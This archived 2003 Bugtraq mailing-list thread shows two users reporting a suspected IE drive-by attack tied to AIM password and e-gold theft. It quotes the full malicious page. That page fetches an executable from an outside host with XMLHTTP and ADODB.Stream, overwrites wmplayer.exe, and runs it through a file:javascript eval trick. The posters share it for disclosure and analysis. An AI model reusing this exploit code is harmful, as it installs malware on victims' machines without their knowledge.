[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: AIM Password theft

To: <bugtraq@xxxxxxxxxxxxxxxxxxxxxxx>
Subject: Re: AIM Password theft
From: "Brent Meshier" <brent@xxxxxxxxxxx>
Date: Tue, 23 Sep 2003 14:13:04 -0500

Mark,
        The code you just sent looks familiar to a SPAM I received
attempting to hijack users' e-gold accounts.  Out of curiosity I
followed that link which loaded start.html (attached).  What worries me
is that I'm running IE 6.0.2800.1106 with all the latest patches from
Microsoft and this page (start.html) rewrote wmplayer.exe on my local
drive without notice.  After closing the page, I found two .exe files on
my desktop (which loaded from http://doz.linux162.onway.net/eg/1.exe).
Is this a new unknown vulnerability?

Brent Meshier
Global Transport Logistics, Inc.
http://www.gtlogistics.com/
"Innovative Fulfillment Solutions"

-----Original Message-----
From: Mark Coleman [mailto:markc@xxxxxxxxxxxxx] 
Sent: Tuesday, September 23, 2003 11:43 AM
To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: [Fwd: Re: AIM Password theft]

Hi, can anyone shed some light on this for me?  If this is new, its 
going to spread like wildfire.  AOL or incidents lists have yet to 
reply....  it appears to be a legitimate threat as I have at least one 
user "infected" already..  Thank you..

-Mark Coleman

<script language="vbs">
self.MoveTo 5000,5000
</script>
<object data="1.php"></object>

<textarea id="code" style="display:none;">

    var x = new ActiveXObject("Microsoft.XMLHTTP");
    x.Open("GET", "http://doz.linux162.onway.net/eg/1.exe",0);
    x.Send();

    var s = new ActiveXObject("ADODB.Stream");
    s.Mode = 3;
    s.Type = 1;
    s.Open();
    s.Write(x.responseBody);

    s.SaveToFile("C:\\Program Files\\Windows Media Player\\wmplayer.exe",2);
    location.href = "mms://";

</textarea>

<script language="javascript">

    function preparecode(code) {
        result = '';
        lines = code.split(/\r\n/);
        for (i=0;i<lines.length;i++) {

            line = lines[i];
            line = line.replace(/^\s+/,"");
            line = line.replace(/\s+$/,"");
            line = line.replace(/'/g,"\\'");
            line = line.replace(/[\\]/g,"\\\\");
            line = line.replace(/[/]/g,"%2f");

            if (line != '') {
                result += line +'\\r\\n';
            }
        }
        return result;
    }

    function doit() {
        mycode = preparecode(document.all.code.value);
        myURL = "file:javascript:eval('" + mycode + "')";
        window.open(myURL,"_media")
    }


    window.open("error.jsp","_media");

    setTimeout("doit()", 5000);


</script>

Follow-Ups:
- Re: AIM Password theft
  - From: jelmer
- Re: AIM Password theft
  - From: Eric Joe
- RE: AIM Password theft
  - From: Drew Copley

Prev by Date: RE: [Fwd: Re: AIM Password theft]
Next by Date: RE: [Fwd: Re: AIM Password theft]
Previous by thread: MondoSoft File Creation vulnerability
Next by thread: Re: AIM Password theft
Index(es):
- Date
- Thread